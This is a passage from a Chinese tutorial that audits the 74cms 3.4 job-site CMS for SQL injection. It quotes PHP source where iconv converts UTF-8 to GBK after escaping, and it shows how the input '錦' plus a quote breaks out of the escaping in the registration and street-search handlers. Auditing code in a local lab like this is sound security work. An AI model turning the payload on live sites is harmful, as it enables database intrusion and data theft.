&lt;h2 id=&quot;0x02_环境搭建&quot;&gt;0x02 环境搭建&lt;/h2&gt;&lt;p&gt;看背景我们使用了低版本的74cms程序，版本为3.4（20140310）&lt;br&gt;①源码网上可以搜到，我打包了一份：&lt;a href=&quot;http://pan.baidu.com/s/1c1mLCru&quot; title=&quot;74cmsV3.4(20140310).zip&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://pan.baidu.com/s/1c1mLCru&lt;/a&gt;&lt;br&gt;②解压到www的74cms(20140310)目录下，浏览器访问&lt;a href=&quot;http://localhost/74cms(20140310&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://localhost/74cms(20140310)&lt;/a&gt;)，然后按照提示一步步安装即可，安装遇到问题请自行百度或谷歌，成功后访问如下图：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql3_02.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x03_漏洞分析&quot;&gt;0x03 漏洞分析&lt;/h2&gt;&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Part1:源码结构&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;源码的结构比较清晰，应该是审计过最清晰的结构 了，主要有下面三块内容：&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql3_03.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;index.php引入了common.inc.php文件，我们跟进common.inc.php，发现了处理gpc的函数:&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;))&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;  = addslashes_deep(&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;))&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt; = addslashes_deep(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$_COOKIE&lt;/span&gt;   = addslashes_deep(&lt;span class=&quot;variable&quot;&gt;$_COOKIE&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;  = addslashes_deep(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;可以看到，服务端处理GET和POST请求的变量时都会做addslashes处理。&lt;br&gt;而且74cms为了防止宽字节注入，将MySQL连接设置为二进制读取，配置在/include/mysql.class.php中：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;connect&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(&lt;span class=&quot;variable&quot;&gt;$dbhost&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$dbuser&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$dbpw&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$dbname&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$dbcharset&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;gbk&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$connect&lt;/span&gt; = &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$func&lt;/span&gt; = &lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$connect&lt;/span&gt;) ? &lt;span class=&quot;string&quot;&gt;&#39;mysql_pconnect&#39;&lt;/span&gt; : &lt;span class=&quot;string&quot;&gt;&#39;mysql_connect&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;linkid = @&lt;span class=&quot;variable&quot;&gt;$func&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$dbhost&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$dbuser&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$dbpw&lt;/span&gt;, &lt;span class=&quot;keyword&quot;&gt;true&lt;/span&gt;)) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;dbshow(&lt;span class=&quot;string&quot;&gt;&#39;Can not connect to Mysql!&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125; &lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;dbversion() &amp;gt; &lt;span class=&quot;string&quot;&gt;&#39;4.1&#39;&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            mysql_query(&lt;span class=&quot;string&quot;&gt;&quot;SET NAMES gbk&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;dbversion() &amp;gt; &lt;span class=&quot;string&quot;&gt;&#39;5.0.1&#39;&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                mysql_query(&lt;span class=&quot;string&quot;&gt;&quot;SET sql_mode = &#39;&#39;&quot;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;linkid);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &lt;span class=&quot;comment&quot;&gt;//character_set_client=binary即二进制方式&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                mysql_query(&lt;span class=&quot;string&quot;&gt;&quot;SET character_set_connection=&quot;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$dbcharset&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&quot;, character_set_results=&quot;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$dbcharset&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&quot;, character_set_client=binary&quot;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;linkid);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;接下来看看php中iconv函数的使用会造成什么样的后果。&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Part2:审计过程&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;注入一分析：&lt;br&gt;1.在/plus/ajax_user.php注册处：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;elseif&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$act&lt;/span&gt; == &lt;span class=&quot;string&quot;&gt;&#39;do_reg&#39;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$captcha&lt;/span&gt; = get_cache(&lt;span class=&quot;string&quot;&gt;&#39;captcha&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$captcha&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;verify_userreg&#39;&lt;/span&gt;] == &lt;span class=&quot;string&quot;&gt;&quot;1&quot;&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$postcaptcha&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;postcaptcha&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$captcha&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;captcha_lang&#39;&lt;/span&gt;] == &lt;span class=&quot;string&quot;&gt;&quot;cn&quot;&lt;/span&gt; &amp;amp;&amp;amp; strcasecmp(QISHI_DBCHARSET, &lt;span class=&quot;string&quot;&gt;&quot;utf8&quot;&lt;/span&gt;) != &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;variable&quot;&gt;$postcaptcha&lt;/span&gt; = iconv(&lt;span class=&quot;string&quot;&gt;&quot;utf-8&quot;&lt;/span&gt;, QISHI_DBCHARSET, &lt;span class=&quot;variable&quot;&gt;$postcaptcha&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$postcaptcha&lt;/span&gt;) || &lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_SESSION&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;imageCaptcha_content&#39;&lt;/span&gt;]) || strcasecmp(&lt;span class=&quot;variable&quot;&gt;$_SESSION&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;imageCaptcha_content&#39;&lt;/span&gt;], &lt;span class=&quot;variable&quot;&gt;$postcaptcha&lt;/span&gt;) != &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;keyword&quot;&gt;exit&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&quot;err&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;require_once&lt;/span&gt;(QISHI_ROOT_PATH . &lt;span class=&quot;string&quot;&gt;&#39;include/fun_user.php&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$username&lt;/span&gt; = &lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;username&#39;&lt;/span&gt;]) ? trim(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;username&#39;&lt;/span&gt;]) : &lt;span class=&quot;keyword&quot;&gt;exit&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&quot;err&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$password&lt;/span&gt; = &lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;password&#39;&lt;/span&gt;]) ? trim(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;password&#39;&lt;/span&gt;]) : &lt;span class=&quot;keyword&quot;&gt;exit&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&quot;err&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$member_type&lt;/span&gt; = &lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;member_type&#39;&lt;/span&gt;]) ? intval(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;member_type&#39;&lt;/span&gt;]) : &lt;span class=&quot;keyword&quot;&gt;exit&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&quot;err&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$email&lt;/span&gt; = &lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;email&#39;&lt;/span&gt;]) ? trim(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;email&#39;&lt;/span&gt;]) : &lt;span class=&quot;keyword&quot;&gt;exit&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&quot;err&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (strcasecmp(QISHI_DBCHARSET, &lt;span class=&quot;string&quot;&gt;&quot;utf8&quot;&lt;/span&gt;) != &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;comment&quot;&gt;//对注册的名字进行utf-8到GBK的编码转换&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$username&lt;/span&gt; = iconv(&lt;span class=&quot;string&quot;&gt;&quot;utf-8&quot;&lt;/span&gt;, QISHI_DBCHARSET, &lt;span class=&quot;variable&quot;&gt;$username&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$password&lt;/span&gt; = iconv(&lt;span class=&quot;string&quot;&gt;&quot;utf-8&quot;&lt;/span&gt;, QISHI_DBCHARSET, &lt;span class=&quot;variable&quot;&gt;$password&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$register&lt;/span&gt; = user_register(&lt;span class=&quot;variable&quot;&gt;$username&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$password&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$member_type&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$email&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;这里我们思考下“錦”这个字，它的utf-8编码是e98ca6，它的gbk编码是e55c，而上面提到过反斜杠\正好为5c。&lt;br&gt;所以如果我们将username设置为：錦’，首先经过addlashes函数或GPC对单引号转义变为：錦\’，然后这里注册时会经过icnov函数会对”錦”转化为gbk编码，最后就是：％e5％5c％5c％27。反斜杠被转义了（％5c％5c），从而单引号逃逸出来引发注入漏洞。&lt;/p&gt;
&lt;p&gt;2.我们继续跟进$register=user_register($username,$password,$member_type,$email);&lt;br&gt;这里的user_register函数，在/include/fun_user.php里：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;//检查简历的完成程度&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;//注册会员&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;user_register&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(&lt;span class=&quot;variable&quot;&gt;$username&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$password&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$member_type&lt;/span&gt;=&lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$email&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$uc_reg&lt;/span&gt;=true)&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;global&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$db&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$timestamp&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$_CFG&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$online_ip&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$QS_pwdhash&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$member_type&lt;/span&gt;=intval(&lt;span class=&quot;variable&quot;&gt;$member_type&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;comment&quot;&gt;//这里是用get_user_inusername函数来判断用户名是否已经存在，我们跟进&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$ck_username&lt;/span&gt;=get_user_inusername(&lt;span class=&quot;variable&quot;&gt;$username&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$ck_email&lt;/span&gt;=get_user_inemail(&lt;span class=&quot;variable&quot;&gt;$email&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    ... ...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$insert_id&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;3.继续跟进get_user_inusername函数，在/include/fun_user.php里：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;get_user_inusername&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(&lt;span class=&quot;variable&quot;&gt;$username&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;global&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$db&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;comment&quot;&gt;//带入查询，可注入～&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&quot;select * from &quot;&lt;/span&gt;.table(&lt;span class=&quot;string&quot;&gt;&#39;members&#39;&lt;/span&gt;).&lt;span class=&quot;string&quot;&gt;&quot; where username = &#39;&amp;#123;$username&amp;#125;&#39; LIMIT 1&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;注入二分析：&lt;br&gt;在plus/ajax_street.php中：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;elseif&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$act&lt;/span&gt; == &lt;span class=&quot;string&quot;&gt;&#39;key&#39;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$key&lt;/span&gt; = trim(&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;key&#39;&lt;/span&gt;]);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$key&lt;/span&gt;)) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (strcasecmp(QISHI_DBCHARSET, &lt;span class=&quot;string&quot;&gt;&quot;utf8&quot;&lt;/span&gt;) != &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;comment&quot;&gt;//对参数key进行utf-8到GBK编码的转换&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;variable&quot;&gt;$key&lt;/span&gt; = iconv(&lt;span class=&quot;string&quot;&gt;&quot;utf-8&quot;&lt;/span&gt;, QISHI_DBCHARSET, &lt;span class=&quot;variable&quot;&gt;$key&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;comment&quot;&gt;//带入查询，可以注入&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$result&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$db&lt;/span&gt;-&amp;gt;query(&lt;span class=&quot;string&quot;&gt;&quot;select * from &quot;&lt;/span&gt; . table(&lt;span class=&quot;string&quot;&gt;&#39;category&#39;&lt;/span&gt;) . &lt;span class=&quot;string&quot;&gt;&quot; where c_alias=&#39;QS_street&#39; AND c_name LIKE &#39;%&amp;#123;$key&amp;#125;%&#39; &quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;comment&quot;&gt;//将查询结果输出到页面中，可回显&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;while&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$row&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$db&lt;/span&gt;-&amp;gt;fetch_array(&lt;span class=&quot;variable&quot;&gt;$result&lt;/span&gt;)) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$listtype&lt;/span&gt; == &lt;span class=&quot;string&quot;&gt;&quot;li&quot;&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &lt;span class=&quot;variable&quot;&gt;$htm&lt;/span&gt; .= &lt;span class=&quot;string&quot;&gt;&quot;&amp;lt;li  title=\&quot;&amp;#123;$row[&#39;c_name&#39;]&amp;#125;\&quot; id=\&quot;&amp;#123;$row[&#39;c_id&#39;]&amp;#125;\&quot;&amp;gt;&amp;#123;$row[&#39;c_name&#39;]&amp;#125;&amp;lt;/li&amp;gt;&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &amp;#125; &lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;streetid&#39;&lt;/span&gt;] = &lt;span class=&quot;variable&quot;&gt;$row&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;c_id&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &lt;span class=&quot;variable&quot;&gt;$url&lt;/span&gt; = url_rewrite(&lt;span class=&quot;string&quot;&gt;&#39;QS_street&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &lt;span 